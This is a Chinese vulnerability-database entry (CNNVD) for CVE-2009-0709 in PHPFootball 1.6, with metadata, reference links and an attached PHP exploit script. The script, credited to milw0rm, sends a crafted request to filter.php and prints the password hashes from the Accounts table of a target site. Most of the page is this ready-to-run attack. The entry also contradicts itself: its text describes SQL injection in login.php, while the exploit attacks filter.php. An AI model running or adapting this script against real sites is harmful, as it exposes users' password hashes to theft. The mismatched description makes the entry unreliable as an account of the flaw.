https://www.exploit-db.com/exploits/7636
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-525
PHPFootball 'login.php'SQL注入漏洞






漏洞ID | 1117181 | 漏洞类型 | SQL注入 |
发布时间 | 2009-01-01 | 更新时间 | 2009-02-24 |
![]() |
CVE-2009-0709 | ![]() |
CNNVD-200902-525 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
PHPFootball是足球球队管理软件用PHP编写的,使用MySQL数据库。PHPFootball1.6版本的login.php中存在SQL注入漏洞。远程攻击者可以借助用户参数,执行任意SQL指令。
|漏洞EXP
<?php
// http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip
$host = $argv[1];
$path = $argv[2];
if ($argc != 3) {
echo "PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit\n";
echo "by KinG-LioN - http://eurohackers.it\n";
echo "Usage: php {$argv[0]} <host> <path>\n";
exit;
}
else {
$head .= "GET /{$path}/filter.php?dbtable=Accounts&dbfield=Password HTTP/1.1\r\n";
$head .= "Host: {$host}\r\n";
$head .= "Connection: close\r\n\r\n";
$fsock = fsockopen ($host,80);
fputs ($fsock,$head);
while (!feof($fsock)) {
$cont .= fgets($fsock);
}
fclose($fsock);
if (preg_match_all("/<td class=td>(.+?)<\/td>/",$cont,$i)) {
print_r($i[1]);
}
else {
die ("exploit error\n");
}
}
?>
# milw0rm.com [2009-01-01]
|参考资料
来源:XF
名称:phpfootball-login-sql-injection(47720)
链接:http://xforce.iss.net/xforce/xfdb/47720
来源:SECUNIA
名称:33367
链接:http://secunia.com/advisories/33367
来源:OSVDB
名称:51104
链接:http://osvdb.org/51104
检索漏洞
开始时间
结束时间